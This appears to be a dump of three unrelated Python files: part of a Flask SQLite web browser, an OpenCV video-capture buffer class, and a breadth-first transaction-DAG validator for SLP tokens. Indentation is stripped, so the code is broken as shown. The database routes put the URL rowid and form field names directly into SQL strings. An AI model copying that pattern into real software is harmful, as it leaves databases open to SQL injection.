flash('Index "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Index name is required.', 'danger')
return render_template(
'drop_index.html',
indexes=indexes,
index_names=index_names,
name=name,
table=table)
@app.route('/<table>/drop-trigger/', methods=['GET', 'POST'])
@require_table
def drop_trigger(table):
request_data = get_request_data()
name = request_data.get('name', '')
triggers = dataset.get_triggers(table)
trigger_names = [trigger.name for trigger in triggers]
if request.method == 'POST':
if name in trigger_names:
dataset.query('DROP TRIGGER "%s";' % name)
flash('Trigger "%s" was dropped successfully!' % name, 'success')
return redirect(url_for('table_structure', table=table))
else:
flash('Trigger name is required.', 'danger')
return render_template(
'drop_trigger.html',
triggers=triggers,
trigger_names=trigger_names,
name=name,
table=table)
@app.route('/<table>/content/')
@require_table
def table_content(table):
page_number = request.args.get('page') or ''
page_number = int(page_number) if page_number.isdigit() else 1
dataset.update_cache(table)
ds_table = dataset[table]
total_rows = ds_table.all().count()
rows_per_page = app.config['ROWS_PER_PAGE']
total_pages = int(math.ceil(total_rows / float(rows_per_page)))
# Restrict bounds.
page_number = min(page_number, total_pages)
page_number = max(page_number, 1)
previous_page = page_number - 1 if page_number > 1 else None
next_page = page_number + 1 if page_number < total_pages else None
query = ds_table.all().paginate(page_number, rows_per_page)
offset = (page_number-1) * rows_per_page
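    # Fetch the rowids for the current page separately so each rendered row can link to the
    # per-row get/update/delete endpoints below.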
rowid_query_tmpl = (
'SELECT rowid FROM {table} {order_by} LIMIT {limit} OFFSET {offset};'
)
ordering = request.args.get('ordering')
order_by_clause = ''
if ordering:
field = ds_table.model_class._meta.columns[ordering.lstrip('-')]
order_by_clause = 'ORDER BY {field} '.format(field=field.name)
if ordering.startswith('-'):
field = field.desc()
order_by_clause += 'DESC'
else:
order_by_clause += 'ASC'
query = query.order_by(field)
rowid_query = rowid_query_tmpl.format(
table=table,
order_by=order_by_clause,
limit=rows_per_page,
offset=offset,
)
rowids = list(map(operator.itemgetter(0),
dataset.query(rowid_query).fetchall()))
field_names = ds_table.columns
fields = get_fields_for_columns(dataset.get_columns(table))
columns = [f.column_name for f in ds_table.model_class._meta.sorted_fields]
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_content.html',
columns=columns,
ds_table=ds_table,
field_names=field_names,
next_page=next_page,
ordering=ordering,
page=page_number,
previous_page=previous_page,
query=zip(rowids, query),
fields=fields,
table=table,
total_pages=total_pages,
total_rows=total_rows,
)
@app.route('/<table>/get/<rowid>', methods=['GET'])
def item_get(table, rowid):
query = 'SELECT * FROM {table} WHERE rowid = ?'.format(table=table)
cursor = dataset.query(query, [rowid])
return jsonify({'fields': cursor.fetchone()})
@app.route('/<table>/update/<rowid>', methods=['POST'])
@require_table
def item_update(table, rowid):
query_tmpl = ('UPDATE {table} SET {fields_update} '
'WHERE rowid = {rowid}')
fields_update = ', '.join([
'{field} = ?'.format(field=field)
for field, _ in request.form.items()
])
values = [value for _, value in request.form.items()]
query = query_tmpl.format(
table=table,
fields_update=fields_update,
rowid=rowid,
)
try:
cursor = dataset.query(query, values)
except (OperationalError, ) as e:
flash(str(e), category='danger')
return redirect(url_for('table_content', table=table))
@app.route('/<table>/query/', methods=['GET', 'POST'])
@require_table
def table_query(table):
data = []
data_description = error = row_count = sql = None
if request.method == 'POST':
sql = request.form['sql']
if 'export_json' in request.form:
return export(table, sql, 'json')
elif 'export_csv' in request.form:
return export(table, sql, 'csv')
try:
cursor = dataset.query(sql)
except Exception as exc:
error = str(exc)
else:
data = cursor.fetchall()[:app.config['MAX_RESULT_SIZE']]
data_description = cursor.description
row_count = cursor.rowcount
else:
if request.args.get('sql'):
sql = request.args.get('sql')
else:
sql = 'SELECT *\nFROM "%s"' % (table)
table_sql = dataset.query(
'SELECT sql FROM sqlite_master WHERE tbl_name = ? AND type = ?',
[table, 'table']).fetchone()[0]
return render_template(
'table_query.html',
data=data,
data_description=data_description,
error=error,
query_images=get_query_images(),
row_count=row_count,
sql=sql,
table=table,
table_sql=table_sql)
@app.route('/table-definition/', methods=['POST'])
def set_table_definition_preference():
key = 'show'
show = False
if request.form.get(key) and request.form.get(key) != 'false':
session[key] = show = True
elif key in session:
del session[key]
return jsonify({key: show})
@app.route('/<table>/delete/<rowid>', methods=['GET'])
@require_table
def item_delete(table, rowid):
query = 'DELETE FROM {table} WHERE rowid = ?'.format(table=table)
try:
cursor = dataset.query(query, [rowid])
except (OperationalError,) as e:
return jsonify({'error': 1, 'message': str(e)})
return jsonify({'error': 0})
def export(table, sql, export_format):
model_class = dataset[table].model_class
query = model_class.raw(sql).dicts()
buf = StringIO()
if export_format == 'json':
kwargs = {'indent': 2}
filename = '%s-export.json' % table
mimetype = 'text/javascript'
else:
kwargs = {}
filename = '%s-export.csv' % table
mimetype = 'text/csv'
dataset.freeze(query, export_format, file_obj=buf, **kwargs)
response_data = buf.getvalue()
response = make_response(response_data)
response.headers['Content-Length'] = len(response_data)
response.headers['Content-Type'] = mimetype
response.headers['Content-Disposition'] = 'attachment; filename=%s' % (
filename)
response.headers['Expires'] = 0
response.headers['Pragma'] = 'public'
return response
@app.route('/<table>/import/', methods=['GET', 'POST'])
@require_table
def table_import(table):
count = None
request_data = get_request_data()
strict = bool(request_data.get('strict'))
if request.method == 'POST':
file_obj = request.files.get('file')
if not file_obj:
flash('Please select an import file.', 'danger')
elif not file_obj.filename.lower().endswith(('.csv', '.json')):
flash('Unsupported file-type. Must be a .json or .csv file.',
'danger')
else:
if file_obj.filename.lower().endswith('.json'):
format = 'json'
else:
format = 'csv'
try:
with dataset.transaction():
count = dataset.thaw(
table,
format=format,
file_obj=file_obj.stream,
strict=strict)
except Exception as exc:
flash('Error importing file: %s' % exc, 'danger')
else:
flash(
'Successfully imported %s objects from %s.' % (
count, file_obj.filename),
'success')
return redirect(url_for('table_content', table=table))
return render_template(
'table_import.html',
count=count,
strict=strict,
table=table)
@app.route('/<table>/drop/', methods=['GET', 'POST'])
@require_table
def drop_table(table):
if request.method == 'POST':
model_class = dataset[table].model_class
model_class.drop_table()
flash('Table "%s" dropped successfully.' % table, 'success')
return redirect(url_for('index'))
return render_template('drop_table.html', table=table)
@app.template_filter('format_index')
def format_index(index_sql):
split_regex = re.compile(r'\bon\b', re.I)
if not split_regex.search(index_sql):
return index_sql
create, definition = split_regex.split(index_sql)
return '\nON '.join((create.strip(), definition.strip()))
@app.template_filter('value_filter')
def value_filter(value, max_length=50):
if isinstance(value, numeric):
return value
if isinstance(value, binary_types):
if not isinstance(value, (bytes, bytearray)):
value = bytes(value) # Handle `buffer` type.
value = value.decode('utf-8', decode_handler)
if isinstance(value, unicode_type):
value = escape(value)
if len(value) > max_length:
return ('<span class="truncated">%s</span> '
'<span class="full" style="display:none;">%s</span>'
'<a class="toggle-value" href="#">...</a>') % (
value[:max_length],
value)
return value
column_re = re.compile(r'(.+?)\((.+)\)', re.S)
column_split_re = re.compile(r'(?:[^,(]|\([^)]*\))+')
def _format_create_table(sql):
create_table, column_list = column_re.search(sql).groups()
columns = [' %s' % column.strip()
for column in column_split_re.findall(column_list)
if column.strip()]
return '%s (\n%s\n)' % (
create_table,
',\n'.join(columns))
@app.template_filter()
def format_create_table(sql):
try:
return _format_create_table(sql)
except:
return sql
@app.template_filter('highlight')
def highlight_filter(data):
return Markup(syntax_highlight(data))
def get_query_images():
accum = []
image_dir = os.path.join(app.static_folder, 'img')
if not os.path.exists(image_dir):
return accum
for filename in sorted(os.listdir(image_dir)):
basename = os.path.splitext(os.path.basename(filename))[0]
parts = basename.split('-')
accum.append((parts, 'img/' + filename))
return accum
#
# Flask application helpers.
#
@app.context_processor
def _general():
return {
'dataset': dataset,
'login_required': bool(app.config.get('PASSWORD')),
}
@app.context_processor
def _now():
return {'now': datetime.datetime.now()}
@app.before_request
def _connect_db():
dataset.connect()
@app.teardown_request
def _close_db(exc):
if not dataset._database.is_closed():
dataset.close()
#
# Script options.
#
def get_option_parser():
parser = optparse.OptionParser()
parser.add_option(
'-p',
'--port',
default=8080,
help='Port for web interface, default=8080',
type='int')
parser.add_option(
'-H',
'--host',
default='127.0.0.1',
help='Host for web interface, default=127.0.0.1')
parser.add_option(
'-d',
'--debug',
action='store_true',
help='Run server in debug mode')
parser.add_option(
'-x',
'--no-browser',
action='store_false',
default=True,
dest='browser',
help='Do not automatically open browser page.')
parser.add_option(
'-P',
'--password',
action='store_true',
dest='prompt_password',
help='Prompt for password to access database browser.')
return parser
def die(msg, exit_code=1):
sys.stderr.write('%s\n' % msg)
sys.stderr.flush()
sys.exit(exit_code)
def open_browser_tab(host, port):
url = 'http://%s:%s/' % (host, port)
def _open_tab(url):
time.sleep(1.5)
webbrowser.open_new_tab(url)
thread = threading.Thread(target=_open_tab, args=(url,))
thread.daemon = True
thread.start()
def install_auth_handler(password):
app.config['PASSWORD'] = password
@app.before_request
def check_password():
if not session.get('authorized') and request.path != '/login/' and \
not request.path.startswith(('/static/', '/favicon')):
flash('You must log-in to view the database browser.', 'danger')
session['next_url'] = request.path
return redirect(url_for('login'))
def main():
global dataset
global migrator
# This function exists to act as a console script entry-point.
parser = get_option_parser()
options, args = parser.parse_args()
if not args:
die('Error: missing required path to database file.')
password = None
if options.prompt_password:
while True:
password = getpass('Enter password: ')
password_confirm = getpass('Confirm password: ')
if password != password_confirm:
print('Passwords did not match!')
else:
break
if options.debug:
app.jinja_env.auto_reload = True
app.jinja_env.cache = None
if password:
install_auth_handler(password)
db_file = args[0]
dataset = SqliteDataSet('sqlite:///%s' % db_file, bare_fields=True)
migrator = dataset._migrator
dataset.close()
if options.browser:
open_browser_tab(options.host, options.port)
app.run(host=options.host, port=options.port, debug=options.debug)
if __name__ == '__main__':
main()
|
video_source.py
|
from queue import Queue
from threading import Thread
import cv2
from .. import utils
class VideoSource:
def __init__(
self,
source,
size,
padding,
buffer_size = 100):
self.__source = source
self.__size = size
self.__padding = padding
self.__buffer_size = buffer_size
self.__is_opened = False
self.__buffer = Queue(maxsize = self.__buffer_size)
self.__capture = cv2.VideoCapture(self.__source)
self.__capture.set(cv2.CAP_PROP_FRAME_WIDTH, self.__size[0])
self.__capture.set(cv2.CAP_PROP_FRAME_HEIGHT, self.__size[1])
def __open(self):
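        # Producer loop: runs on a background daemon thread and keeps the bounded frame queue topped up.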
self.__is_opened = True
while self.__is_opened:
if not self.__buffer.full():
success, image = self.__capture.read()
if success:
resized_image = utils.resize(
cv2.flip(image, 1),
self.__size,
self.__padding)
self.__buffer.put((resized_image, self.__size))
else:
self.__is_opened = False
def source(self):
return self.__source
def size(self):
return self.__size
def padding(self):
return self.__padding
def buffer_size(self):
return self.__buffer_size
def is_opened(self):
return self.__is_opened
def open(self):
thread = Thread(target = self.__open, daemon = True)
thread.start()
def close(self):
self.__is_opened = False
def read(self):
return self.__buffer.get()
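
# Illustrative only -- a minimal usage sketch, not part of the original module. It assumes the
# package-relative `utils.resize` import above resolves and that an OpenCV-readable source is given.
#
#     source = VideoSource(source=0, size=(640, 480), padding=0)
#     source.open()                      # start the background capture thread
#     while source.is_opened():
#         frame, size = source.read()    # blocks until a buffered frame is available
#         ...                            # process the frame here
#     source.close()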
|
slp_dagging.py
|
"""
Breadth-first DAG digger for colored coins.
We do a breadth-first DAG traversal starting with the transaction-of-interest
at the source, and digging into ancestors layer by layer. Along the way we
prune off some connections, invalidate+disconnect branches, etc.,
so our 'search DAG' is a subset of the transaction DAG. To hold this
dynamically changing search DAG, we have a TokenGraph class.
(It's much simpler to run a full node and validate as transactions appear, but
we have no such luxury in a light wallet.)
Threading
=========
The TokenGraph and Node objects are not threadsafe. It is fine however to
have different graphs/nodes being worked on by different threads (see
slp_validator_0x01).
"""
import sys
import threading
import queue
import traceback
import weakref
import collections
from abc import ABC, abstractmethod
from .transaction import Transaction
from .util import PrintError
INF_DEPTH=2147483646 # 'infinity' value for node depths. 2**31 - 2
from . import slp_graph_search # thread doesn't start until instantiation, one thread per search job, w/ shared txn cache
class hardref:
# a proper reference that mimics weakref interface
    __slots__ = ('_obj',)
def __init__(self,obj):
self._obj = obj
def __call__(self,):
return self._obj
class DoubleLoadException(Exception):
pass
class ValidatorGeneric(ABC):
"""
The specific colored coin implementation will need to make a 'validator'
object according to this template.
Implementations should:
- Define `get_info`, `check_needed`, and `validate` methods.
- Define `validity_states` dictionary.
- Set `prevalidation` to one of the following:
False - only call validate() once per tx, when all inputs are concluded.
True - call validate() repeatedly, starting when all inputs are downloaded.
(only useful if this can provide early validity conclusions)
"""
prevalidation = False
validity_states = {
0: 'Unknown',
1: 'Valid',
2: 'Invalid',
}
@abstractmethod
def get_info(self, tx):
""" This will be called with a Transaction object; use it to extract
all information necessary during the validation process (after call,
the Transaction object will be forgotten).
Allowed return values:
('prune', validity) -- prune this tx immediately, remember only validity.
(vin_mask, myinfo, outputs)
-- information for active, *potentially* valid tx.
The list `vin_mask = (True, False, False, True, ...)` tells which tx
inputs are to be considered for validation.
The list `outputs = (out_1, out_2, ...)` provides info that is needed
to validate descendant transactions. (e.g., how many tokens).
`vin_mask` and `outputs` must have lengths matching the tx inputs/outputs.
See `validate` for how these are used.
Pruning is done by replacing node references with prunednodes[validity] .
These will provide None as info for children.
"""
@abstractmethod
def check_needed(self, myinfo, out_n):
"""
As each input gets downloaded and its get_info() gets computed, we
check whether it is still relevant for validation.
(This is used to disconnect unimportant branches.)
Here we pass in `myinfo` from the tx, and `out_n` from the input
tx's get_info(); if it was pruned then `out_n` will be None.
"""
@abstractmethod
def validate(self, myinfo, inputs_info):
"""
Run validation. Only gets called after filtering through check_needed.
`myinfo` is direct from get_info().
        `inputs_info` is a list with the same length as `vins` from get_info()
[(vin_0, validity_0, out_n_0),
(vin_1, validity_1, out_n_1),
...
]
out_n_0 is the info from 0'th input's get_info() function,
but may be None if pruned/invalid.
Return:
None if undecided, or
(keepinfo, validity) if final judgement.
keepinfo may be:
False - prune, just save validity judgement.
True - save info and validity.
validity may be:
1 - valid
2 - invalid
Typically (False, 2) and (True, 1) but you *could* use (True, 2)
if it's necessary for children to know info from invalid parents.
"""
########
# Validation jobbing mechanics (downloading txes, building graph
########
def emptygetter(i):
raise KeyError
class ValidationJob:
"""
Manages a job whose actions are held in mainloop().
This implementation does a basic breadth-first search.
"""
download_timeout = 5
downloads = 0
currentdepth = 0
debugging_graph_state = False
stopping = False
running = False
stop_reason = None
has_never_run = True
def __init__(self, graph, txid, network,
fetch_hook=None,
validitycache=None,
download_limit=None, depth_limit=None,
debug=False, ref=None):
"""
graph should be a TokenGraph instance with the appropriate validator.
txid is the root of the graph to be validated.
txids is a list of the desired transactions.
network is a lib.network.Network object, will be used to download when
transactions can't be found in the cache.
fetch_hook (optional) called as fetch_hook({txid0,txid1,...},depth) whenever
a set of transactions is loaded into the graph (from cache or network)
at a given depth level. It should return a list of matching Transaction
objects, for known txids (e.g., from wallet or elsewhere),
but also can do other things (like fetching proxy results). Any txids
that are not returned will be fetched by network.
validitycache (optional) invoked as validitycache[txid_hex],
and should raise KeyError, otherwise return a validity value
that will be passed to load_tx.
download_limit is enforced by stopping search when the `downloads`
attribute exceeds this limit. (may exceed it by several, since
downloads are requested in parallel)
depth_limit sets the maximum graph depth to dig to.
"""
self.ref = ref and weakref.ref(ref)
self.graph = graph
self.root_txid = txid
self.txids = tuple([txid])
self.network = network
self.fetch_hook = fetch_hook
self.graph_search_job = None
self.validitycache = {} if validitycache is None else validitycache
self.download_limit = download_limit
if depth_limit is None:
self.depth_limit = INF_DEPTH - 1
else:
self.depth_limit = depth_limit
self.callbacks = []
self.debug = debug
self.exited = threading.Event()
self._statelock = threading.Lock()
def __repr__(self,):
if self.running:
state = 'running'
else:
try:
state = 'stopped:%r'%(self.stop_reason,)
except AttributeError:
state = 'waiting'
return "<%s object (%s) for txids=%r ref=%r>"%(type(self).__qualname__, state, self.txids, self.ref and self.ref())
def belongs_to(self, ref):
return ref is (self.ref and self.ref())
def has_txid(self, txid):
return txid in self.txids
## Job state management
def run(self,):
""" Wrapper for mainloop() to manage run state. """
with self._statelock:
if self.running:
raise RuntimeError("Job running already", self)
self.stopping = False
self.paused = False
self.running = True
self.stop_reason = None
self.has_never_run = False
try:
retval = self.mainloop()
return retval
except:
retval = 'crashed'
raise
finally:
self.exited.set()
with self._statelock:
self.stop_reason = retval
self.running = False
self.stopping = False
cbl = tuple(self.callbacks) # make copy while locked -- prevents double-callbacks
for cbr in cbl:
cb = cbr() # callbacks is a list of indirect references (may be weakrefs)
if cb is not None:
cb(self)
def stop(self,):
""" Call from another thread, to request stopping (this function
returns immediately, however it may take time to finish the current
set of micro-tasks.)
If not running then this is ignored and False returned.
Otherwise, True is returned."""
with self._statelock:
if self.running:
self.stopping = True
return True
else:
return False
def pause(self):
with self._statelock:
if self.running:
self.paused = True
return True
else:
return False
#@property
#def runstatus(self,):
#with self._statelock:
#if self.stopping:
#return "stopping"
#elif self.running:
#return "running"
#elif self.paused:
#return "paused"
#else:
#return "stopped"
def add_callback(self, cb, way='direct', allow_run_cb_now=True):
"""
Callback will be called with cb(job) upon stopping. May be called
more than once if job is restarted.
If job has run and is now stopped, this will be called immediately
(in calling thread) so as to guarantee it runs at least once.
`way` may be
- 'direct': store direct reference to `cb`.
- 'weak' : store weak reference to `cb`
- 'weakmethod' : store WeakMethod reference to `cb`.
        (Use 'weakmethod' for bound methods! See the weakref documentation.)
        """
if way == 'direct':
cbr = hardref(cb)
elif way == 'weak':
cbr = weakref.ref(cb)
elif way == 'weakmethod':
cbr = weakref.WeakMethod(cb)
else:
raise ValueError(way)
with self._statelock:
self.callbacks.append(cbr)
if self.running or self.has_never_run:
# We are waiting to run first time, or currently running.
run_cb_now = False
else:
# We have run and we are now stopped.
run_cb_now = True
if run_cb_now and allow_run_cb_now:
cb(self)
## Validation logic (breadth-first traversal)
@property
def nodes(self,):
# get target nodes
return {t:self.graph.get_node(t) for t in self.txids}
def mainloop(self,):
""" Breadth-first search """
target_nodes = list(self.nodes.values())
self.graph.debugging = bool(self.debug)
if self.debug == 2:
# enable printing whole graph state for every step.
self.debugging_graph_state = True
self.graph.root.set_parents(target_nodes)
self.graph.run_sched()
def skip_callback(txid):
print("########################################## SKIPPING " + txid + " ###########################################")
node = self.graph.get_node(txid)
node.set_validity(False,2)
# temp for debugging
# f = open("dag-"+self.txids[0][0:5]+".txt","a")
# f.write(txid+","+str(self.currentdepth)+",false,\n")
def dl_callback(tx):
#will be called by self.get_txes
txid = tx.txid_fast()
# temp for debugging
# f = open("dag-"+self.txids[0][0:5]+".txt","a")
# f.write(txid+","+str(self.currentdepth)+",true,\n")
node = self.graph.get_node(txid)
try:
val = self.validitycache[txid]
except KeyError:
val = None
try:
node.load_tx(tx, cached_validity=val)
except DoubleLoadException:
pass
while True:
if self.stopping:
self.graph.debug("stop requested")
return "stopped"
if self.paused:
self.graph.debug("pause requested")
return "paused"
if not any(n.active for n in target_nodes):
# Normal finish - the targets are known.
self.graph.debug("target transactions finished")
return True
if self.download_limit is not None and self.downloads >= self.download_limit:
self.graph.debug("hit the download limit.")
return "download limit reached"
# fetch all finite-depth nodes
waiting = self.graph.get_waiting(maxdepth=self.depth_limit - 1)
if len(waiting) == 0: # No waiting nodes at all ==> completed.
# This really shouldn't happen
self.graph.debug("exhausted graph without conclusion.")
return "inconclusive"
# select all waiting txes at or below the current depth
interested_txids = {n.txid for n in waiting
if (n.depth <= self.currentdepth)}
if len(interested_txids) == 0:
# current depth exhausted, so move up
self.currentdepth += 1
if self.currentdepth > self.depth_limit:
self.graph.debug("reached depth stop.")
return "depth limit reached"
self.graph.debug("moving to depth = %d", self.currentdepth)
continue
# Download and load up results; this is the main command that
# will take time in this loop.
txids_missing = self.get_txes(interested_txids, dl_callback, skip_callback)
# do graph maintenance (ping() validation, depth recalculations)
self.graph.run_sched()
# print entire graph (could take a lot of time!)
if self.debugging_graph_state:
self.graph.debug("Active graph state:")
n_active = 0
for txid,n in self.graph._nodes.items():
if not n.active:
continue
self.graph.debug(" %.10s...[%8s] depth=%s"%(txid, n.status, str(n.depth) if n.depth != INF_DEPTH else 'INF_DEPTH'))
n_active += 1
if n_active == 0:
self.graph.debug(" (empty)")
txids_gotten = interested_txids.difference(txids_missing)
if len(txids_gotten) == 0:
return "missing txes"
raise RuntimeError('loop ended')
def get_txes(self, txid_iterable, dl_callback, skip_callback, errors='print'):
"""
Get multiple txes 'in parallel' (requests all sent at once), and
        block while waiting. We first try to obtain txes via fetch_hook, and
        only ask the network for those still missing.
As they are received, we call `dl_callback(tx)` in the current thread.
Returns a set of txids that could not be obtained, for whatever
reason.
`errors` may be 'ignore' or 'raise' or 'print'.
"""
txid_set = set(txid_iterable)
#search_id = ''.join(list(self.txids)) + "_" + str(self.currentdepth)
# first try to get from cache
if self.fetch_hook:
txns_cache = self.fetch_hook(txid_set, self)
cached = list(txns_cache)
for tx in cached:
# remove known txes from list
txid = tx.txid_fast()
txid_set.remove(txid)
else:
cached = []
# Graph Search Hack
# =====
# Here we determine if missing txids can just be inferred to be invalid
# because they are not currently in graph search results. The benefit is to
# prevent network calls to fetch non-contributing/invalid txns.
#
        # This optimization requires that all cache items come from the "graph_search" source.
#
if self.graph_search_job and self.graph_search_job.search_success:
for tx in cached:
dl_callback(tx)
for txid in txid_set:
skip_callback(txid)
txid_set.clear()
return txid_set
# build requests list from remaining txids.
requests = []
if self.network:
for txid in sorted(txid_set):
requests.append(('blockchain.transaction.get', [txid]))
if len(requests) > 0:
q = queue.Queue()
self.network.send(requests, q.put)
# Now that the net request is going, start processing cached txes.
for tx in cached:
dl_callback(tx)
# And start processing downloaded txes:
for _ in requests: # fetch as many responses as were requested.
try:
resp = q.get(True, self.download_timeout)
except queue.Empty: # timeout
break
if resp.get('error'):
if errors=="print":
print("Tx request error:", resp.get('error'), file=sys.stderr)
elif errors=="raise":
raise RuntimeError("Tx request error", resp.get('error'))
else:
raise ValueError(errors)
continue
raw = resp.get('result')
self.downloads += 1
tx = Transaction(raw)
txid = tx.txid_fast()
try:
txid_set.remove(txid)
except KeyError:
if errors=="print":
print("Received un-requested txid! Ignoring.", txid, file=sys.stderr)
elif errors=="raise":
raise RuntimeError("Received un-requested txid!", txid)
else:
raise ValueError(errors)
else:
dl_callback(tx)
return txid_set
class ValidationJobManager(PrintError):
"""
A single thread that processes validation jobs sequentially.
"""
def __init__(self, threadname="ValidationJobManager", graph_context=None, exit_when_done=False):
# ---
self.graph_context = graph_context
self.jobs_lock = threading.Lock()
self.job_current = None
self.jobs_pending = [] # list of jobs waiting to run.
self.jobs_finished = weakref.WeakSet() # set of jobs finished normally.
self.jobs_stopped = weakref.WeakSet() # set of jobs stopped by calling .stop(), or that terminated abnormally with an error and/or crash
self.jobs_paused = [] # list of jobs that stopped by calling .pause()
self.all_jobs = weakref.WeakSet()
self.wakeup = threading.Event() # for kicking the mainloop to wake up if it has fallen asleep
self.exited = threading.Event() # for synchronously waiting for jobmgr to exit
# ---
self._exit_when_done = exit_when_done
self._killing = False # set by .kill()
# Kick off the thread
self.thread = threading.Thread(target=self.mainloop, name=threadname, daemon=True)
self.thread.start()
@property
def threadname(self):
return (self.thread and self.thread.name) or ''
def diagnostic_name(self): return self.threadname
def add_job(self, job):
""" Throws ValueError if job is already pending. """
with self.jobs_lock:
if job in self.all_jobs:
raise ValueError
self.all_jobs.add(job)
self.jobs_pending.append(job)
self.wakeup.set()
def _stop_all_common(self, job):
        ''' Private method, properly stops a job (even if paused or pending),
        checking the appropriate lists. Returns True on success or False if
        the job was not found in the appropriate lists.'''
if job.stop():
return True
else:
# Job wasn't running -- try and remove it from the
# pending and paused lists
try:
self.jobs_pending.remove(job)
return True
except ValueError:
pass
try:
self.jobs_paused.remove(job)
return True
except ValueError:
pass
return False
def stop_all_for(self, ref):
ret = []
with self.jobs_lock:
for job in list(self.all_jobs):
if job.belongs_to(ref):
if self._stop_all_common(job):
ret.append(job)
return ret
def stop_all_with_txid(self, txid):
ret = []
with self.jobs_lock:
for job in list(self.all_jobs):
if job.has_txid(txid):
if self._stop_all_common(job):
ret.append(job)
return ret
def pause_job(self, job):
"""
Returns True if job was running or pending.
Returns False otherwise.
"""
with self.jobs_lock:
if job is self.job_current:
if job.pause():
return True
else:
# rare situation
# - running job just stopped.
return False
else:
try:
self.jobs_pending.remove(job)
except ValueError:
return False
else:
self.jobs_paused.append(job)
return True
def unpause_job(self, job):
""" Take a paused job and put it back into pending.
Throws ValueError if job is not in paused list. """
with self.jobs_lock:
self.jobs_paused.remove(job)
self.jobs_pending.append(job)
self.wakeup.set()
def kill(self, ):
"""Request to stop running job (if any) and to after end thread.
Irreversible."""
self._killing = True
self.wakeup.set()
try:
self.job_current.stop()
except:
pass
self.graph_context = None
def mainloop(self,):
ran_ctr = 0
try:
if threading.current_thread() is not self.thread:
raise RuntimeError('wrong thread')
while True:
if self._killing:
return
with self.jobs_lock:
self.wakeup.clear()
has_paused_jobs = bool(len(self.jobs_paused))
try:
self.job_current = self.jobs_pending.pop(0)
except IndexError:
# prepare to sleep, outside lock
self.job_current = None
if self.job_current is None:
if self._exit_when_done and not has_paused_jobs and ran_ctr:
# we already finished our enqueued jobs, nothing is paused, so just exit since _exit_when_done == True
return # exit thread when done
self.wakeup.wait()
continue
try:
retval = self.job_current.run()
ran_ctr += 1
except BaseException as e:
# NB: original code used print here rather than self.print_error
# for unconditional printing even if not running with -v.
# We preserve that behavior, for now.
print("vvvvv validation job error traceback", file=sys.stderr)
traceback.print_exc()
print("^^^^^ validation job %r error traceback"%(self.job_current,), file=sys.stderr)
self.jobs_stopped.add(self.job_current)
else:
with self.jobs_lock:
if retval is True:
self.jobs_finished.add(self.job_current)
elif retval == 'paused':
self.jobs_paused.append(self.job_current)
else:
self.jobs_stopped.add(self.job_current)
self.job_current = None
except:
traceback.print_exc()
print("Thread %s crashed :("%(self.thread.name,), file=sys.stderr)
finally:
self.exited.set()
self.print_error("Thread exited")
########
# Graph stuff below
########
class TokenGraph:
""" Used with Node class to hold a dynamic DAG structure, used while
traversing the transaction DAG. This dynamic DAG holds dependencies
among *active* transactions (nonzero contributions with unknown validity)
and so it's a subset of the transactions DAG.
Why dynamic? As we go deeper we add connections, sometimes adding
connections between previously-unconnected parts. We can also remove
connections as needed for pruning.
The terms "parent" and "child" refer to the ancestry of a tx -- child
transactions contain (in inputs) a set of pointers to their parents.
A key concept is the maintenance of a 'depth' value for each active node,
which represents the shortest directed path from root to node. The depth
is used to prioritize downloading in a breadth-first search.
Nodes that are inactive or disconnected from root are assigned depth=INF_DEPTH.
Graph updating occurs in three phases:
Phase 1: Waiting nodes brought online with load_tx().
Phase 2: Children get notified of parents' updates via ping(), which may
further alter graph (as validity conclusions get reached).
Phase 3: Depths updated via recalc_depth().
At the end of Phase 3, the graph is stabilized with correct depth values.
`root` is a special origin node fixed at depth=-1, with no children.
The actual transaction(s) under consideration get added as parents of
this root and hence they are depth=0.
Rather than call-based recursion (cascades of notifications running up and
down the DAG) we use a task scheduler, provided by `add_ping()`,
`add_recalc_depth()` and `run_sched()`.
"""
debugging = False
def __init__(self, validator):
self.validator = validator
self._nodes = dict() # txid -> Node
self.root = NodeRoot(self)
self._waiting_nodes = []
# requested callbacks
self._sched_ping = set()
self._sched_recalc_depth = set()
# create singletons for pruning
self.prunednodes = {v:NodeInactive(v, None) for v in validator.validity_states.keys()}
# Threading rule: we never call node functions while locked.
# self._lock = ... # threading not enabled.
def reset(self, ):
# copy nodes and reset self
prevnodes = self._nodes
TokenGraph.__init__(self, self.validator)
# nuke Connections to encourage prompt GC
for n in prevnodes.values():
try:
n.conn_children = []
n.conn_parents = []
except:
pass
def debug(self, formatstr, *args):
if self.debugging:
print("DEBUG-DAG: " + formatstr%args, file=sys.stderr)
def get_node(self, txid):
# with self._lock:
try:
node = self._nodes[txid]
except KeyError:
node = Node(txid, self)
self._nodes[txid] = node
self._waiting_nodes.append(node)
return node
def replace_node(self, txid, replacement):
self._nodes[txid] = replacement # threadsafe
def add_ping(self, node):
self._sched_ping.add(node) # threadsafe
def add_recalc_depth(self, node, depthpriority):
# currently ignoring depthpriority
self._sched_recalc_depth.add(node) # threadsafe
def run_sched(self):
""" run the pings scheduled by add_ping() one at a time, until the
schedule list is empty (note: things can get added/re-added during run).
then do the same for stuff added by add_recalc_depth().
TODO: consider making this depth prioritized to reduce redundant work.
"""
# should be threadsafe without lock (pop() is atomic)
while True:
try:
node = self._sched_ping.pop()
except KeyError:
return
node.ping()
while True:
try:
node = self._sched_recalc_depth.pop()
except KeyError:
return
node.recalc_depth()
def get_waiting(self, maxdepth=INF_DEPTH):
""" Return a list of waiting nodes (that haven't had load_tx called
yet). Optional parameter specifying maximum depth. """
# with self._lock:
# First, update the _waiting_nodes list.
waiting_actual = [node for node in self._waiting_nodes if node.waiting]
# This is needed to handle an edge case in NFT1 validation
# this occurs when the child genesis is paused and is also the root_txid of the job
from .slp_validator_0x01_nft1 import Validator_NFT1
if isinstance(self.validator, Validator_NFT1) and len(waiting_actual) == 0:
waiting_actual.extend([conn.parent for conn in self.root.conn_parents if conn.parent.waiting])
self._waiting_nodes = waiting_actual
if maxdepth == INF_DEPTH:
return list(waiting_actual) # return copy
else:
return [node for node in waiting_actual
if node.depth <= maxdepth]
def get_active(self):
return [node for node in self._nodes.values() if node.active]
def finalize_from_proxy(self, proxy_results):
"""
Iterate over remaining active nodes and set their validity to the proxy result,
starting from the deepest ones and moving up.
"""
active = self.get_active()
active = sorted(active, key = lambda x: x.depth, reverse=True)
for n in active:
if not n.active or n.depth == INF_DEPTH:
# some nodes may switch to inactive or lose depth while we are updating; skip them
continue
txid = n.txid
try:
proxyval = proxy_results[txid]
except KeyError:
